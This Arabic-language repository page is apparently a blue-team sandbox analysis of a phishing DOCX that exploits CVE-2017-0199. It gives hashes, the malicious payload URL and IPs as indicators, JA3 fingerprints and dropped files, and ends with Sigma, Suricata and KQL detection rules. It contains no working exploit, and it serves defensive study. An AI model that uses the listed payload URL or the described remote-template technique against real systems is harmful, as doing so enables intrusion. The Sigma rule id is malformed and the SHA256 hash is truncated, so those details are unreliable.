العودة إلى التحديثات
UpdatedJul 28, 2026

RCE-CVE-2017-0199-detection-analysis — Updated!

يحتوي هذا المستودع على تحليل كامل للبرامج الضارة من منظور الفريق الأزرق لمستند DOCX ضار حقيقي يستغل CVE-2017-0199. يشمل المختبر التنفيذ في بيئة معزولة، وتحليل الشبكات، واستخراج مؤشرات الاختراق (IOC)، ورسم خرائط MITRE ATT&CK، ومراجعة الملفات المسقطة، وقواعد الكشف. تم تضمين لقطات الأدلة داخل مجلد evidence للتوثيق الاحترافي.

مشاركة

🛡️ BankPaymAdviceVend.Report.docx CVE-2017-0199 – تحليل كامل من منظور الفريق الأزرق في صندوق الرمل

تفجير متقدم للبرامج الضارة • سلوك الاستغلال • مؤشرات الاختراق • هندسة الكشف



🎯 1. ملخص تنفيذي

يُوثّق هذا المستودع ملف **DOCX ضار حقيقي** يستغل ثغرة **CVE-2017-0199** لتنفيذ الأكواد عن بُعد في Microsoft Office. تم تفجير العينة داخل صندوق رمل **Windows 10 في ANY.RUN**، مما كشف عن:

✔ سلسلة الاستغلال الكاملة
✔ اتصالات شبكية إلى نطاق ضار (tt.vg)
✔ ملفات تم إنزالها وأثر مؤقت
✔ بصمات JA3
✔ نشاط في السجل
✔ إشارات HTTP/HTTPS من WINWORD.EXE
✔ مؤشرات اختراق كاملة وقواعد كشف للفريق الأزرق


🔍 2. خلفية السيناريو

تم استلام مستند بعنوان "BankPaymAdviceVend.Report.docx" عبر بريد إلكتروني تصيدي.
بمجرد تفجيره، صنّفه ANY.RUN فورًا كـ ضار وربطه بـ:

  • استغلال CVE-2017-0199 في Word لتنفيذ الأكواد عن بعد
  • قيام WINWORD.EXE باتصالات HTTP/HTTPS خفية
  • الاتصال بـ النطاق القصير الضار tt.vg
  • محاولة جلب حمولة عن بعد /BVhaS


📄 3. معلومات العينة

الحقلالقيمة
الملفBankPaymAdviceVend.Report.docx
الحكمنشاط ضار
الوسومcve-2017-0199, exploit
MD522EDED727467A9A26F3FD311A12A7E
SHA16738D1A969193459C7C7579956269D77FED8D26F
SHA2562E1408013503C...3D6EAF9
صندوق الرملWindows 10 Pro x64
السلوكاستغلال → إشارات شبكية → ملفات منزلة

🧬 4. سلسلة الهجوم (رسم بياني عالي المستوى)

[ مستند DOCX ضار ] │ ▼ [ المستخدم يفتحه في Word ] │ ▼ [ يتم تفعيل استغلال CVE-2017-0199 ] │ ▼ [ WINWORD.EXE → tt.vg عبر HTTP/HTTPS ] │ ▼ [ المسار البعيد: /BVhaS (GET / HEAD / OPTIONS) ] │ ▼ [ يتم إنزال ملفات مؤقتة، كائنات EMF، ملفات ذاكرة تخزين مؤقت ] │ ▼ [ حمولة محتملة للمرحلة التالية — الخادم أعاد 404 ]

yaml Copy code


🌐 5. السلوك الشبكي

5.1 طلبات DNS

نطاق واحد فقط كان ضارًا:

النطاقالسمعة
tt.vg🔴 ضار

عناوين IP التي تم حلها:

188.114.96.3 188.114.97.3 172.67.138.42 (TLS v1.2)

yaml Copy code


📡 5.2 الإشارات HTTP/HTTPS

حاول Word جلب:

GET /BVhaS HEAD /BVhaS OPTIONS / Host: tt.vg User-Agent: Microsoft Office / MSIE 7 spoof

yaml Copy code

طلب نموذجي تم التقاطه:

GET /BVhaS HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0...) Connection: Keep-Alive Host: tt.vg

arduino Copy code

استجابة الخادم:

HTTP/1.1 404 Not Found

yaml Copy code


📁 6. الملفات المنزلة

أثر بارز

  • عدة ملفات .tmp
  • كائنات رسومية Office .glox
  • صور EMF في ذاكرة التخزين المؤقت للمتصفح:
    %LOCALAPPDATA%\INetCache\Content.MSO\*.emf
  • اختصار المستند الأخير .LNK
  • سجلات index.dat
  • تغييرات في قاموس التدقيق الإملائي لـ Office

🔐 7. سلوك السجل والنظام

تمكن Word من الوصول إلى:

HKCU\Software\Microsoft\Office\14.0... HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings... HKLM\System\ControlSet001\Services\Tcpip\Parameters\Interfaces...

yaml Copy code

✔ طبيعي لـ Office
❌ عند دمجه مع الاستغلال = سلوك ضار واضح


💣 8. تحليل الاستغلال — CVE-2017-0199

النوع: تنفيذ أكواد عن بعد
طريقة التفعيل: مستند DOCX ضار يحمل HTA عن بُعد دون تفاعل المستخدم
النطاق المتأثر: Microsoft Word 2007–2016
التأثير: تنفيذ المهاجم لأكواد تعسفية

تحاول هذه العينة تحميل حمولة عن بُعد من:

http://tt.vg/BVhaS

yaml Copy code


🧩 9. مؤشرات الاختراق (IOCs)

🔥 9.1 مؤشرات شبكية

النطاق: tt.vg

عناوين URL: http://tt.vg/BVhaS https://tt.vg/BVhaS

عناوين IP: 188.114.96.3 188.114.97.3 172.67.138.42

shell Copy code

🔐 9.2 بصمات SSL JA3

091f51a7a1c3a4504a224cc081ce9cee 46f5131e766d248db0248a86c494b71c 65005c9d9ae0f0ebeaf22c210571d482 ...

yaml Copy code


🔍 10. أفكار للكشف (Sigma / Suricata / EDR)

يحوّل هذا القسم التحليل التقني لملف BankPaymAdviceVend.Report.docx إلى أدوات كشف عملية جاهزة للإنتاج يمكن لـ مركز عمليات الأمن (SOC) أو الفريق الأزرق نشرها فورًا. يتضمن قواعد Sigma و توقيعات Suricata IDS و استعلامات صيد EDR.


🧾 10.1 قاعدة Sigma — WINWORD ← tt.vg

تكتشف قاعدة Sigma هذه أي اتصال شبكي يبدأه WINWORD.EXE باتجاه النطاق القصير المشبوه tt.vg داخل سجلات شبكة Windows.

title: WINWORD Connecting To Suspicious Short Domain tt.vg
id: 0b2a5f3d-ttvg-word
status: experimental

logsource:
  category: network_connection
  product: windows

detection:
  selection:
    Image|endswith: '\WINWORD.EXE'
    DestinationHostname: 'tt.vg'
  condition: selection

level: high
tags:
  - attack.command_and_control
  - attack.t1071.001
  - cve.2017-0199

💡 أي نظام Office قديم يتصل بـ tt.vg عبر WINWORD.EXE يجب أن يؤدي إلى تحقيق فوري.


🌐 10.2 قاعدة Suricata — HTTP GET /BVhaS على tt.vg

قاعدة Suricata IDS تحدد طلبًا من أصل Office لـ GET /BVhaS على النطاق الضار tt.vg. هذا يلتقط محاولة جلب الحمولة الخاصة بالاستغلال.

alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"C2 – Office WINWORD GET /BVhaS on tt.vg";
    flow:established,to_server;
    http.method; content:"GET";
    http.uri; content:"/BVhaS"; nocase;
    http.host; content:"tt.vg"; nocase;
    http.user_agent; content:"MSOffice"; nocase;
    reference:cve,2017-0199;
    classtype:trojan-activity;
    sid:4200010;
    rev:1;
)

🔥 فعالة جدًا في البيئات التي تستخدم Suricata أو Zeek لمراقبة حركة المرور الصادرة.


🛰️ 10.3 استعلام صيد EDR — WINWORD + مؤشرات tt.vg

استعلام صيد KQL (لـ Microsoft Defender) يُستخدم لتحديد أي جهاز في البيئة يُظهر إشارات ضارة مماثلة إلى tt.vg أو عناوين IP المرتبطة به.

DeviceNetworkEvents
| where InitiatingProcessFileName == "WINWORD.EXE"
| where RemoteUrl in ("tt.vg")
   or RemoteIp in ("188.114.96.3","188.114.97.3","172.67.138.42")

🎯 الهدف: توسيع نطاق تفجير صندوق رمل واحد إلى صيد على مستوى المؤسسة بالكامل.


🧩 11. ما يوضحه هذا المختبر

يُظهر هذا المختبر قدرتك على تحليل عينة DOCX تصيدي حقيقية من البداية إلى النهاية، باتباع منهجية كاملة على مستوى مركز عمليات الأمن (SOC):

  • فهم كيفية تفعيل CVE-2017-0199 داخل Microsoft Word.
  • تتبع كيف يصبح WINWORD.EXE عميل HTTP/S غير متوقع.
  • استخراج مؤشرات الاختراق الشبكية (النطاقات، عناوين URL، عناوين IP، تجزئات TLS JA3).
  • تحليل الملفات المنزلة و الاختصارات الحديثة و الوصول إلى السجل للقيمة الجنائية.
  • تحويل جميع النتائج إلى قواعد Sigma و Suricata و استعلامات صيد EDR.

بمعنى آخر — لا يتوقف هذا المختبر عند التفجير. بل يستخرج معلومات كشف قابلة للتنفيذ وحقيقية تمامًا مثل محلل SOC محترف.


تم التصميم والتوثيق بواسطة أحمد طارق — الفريق الأزرق

الفئات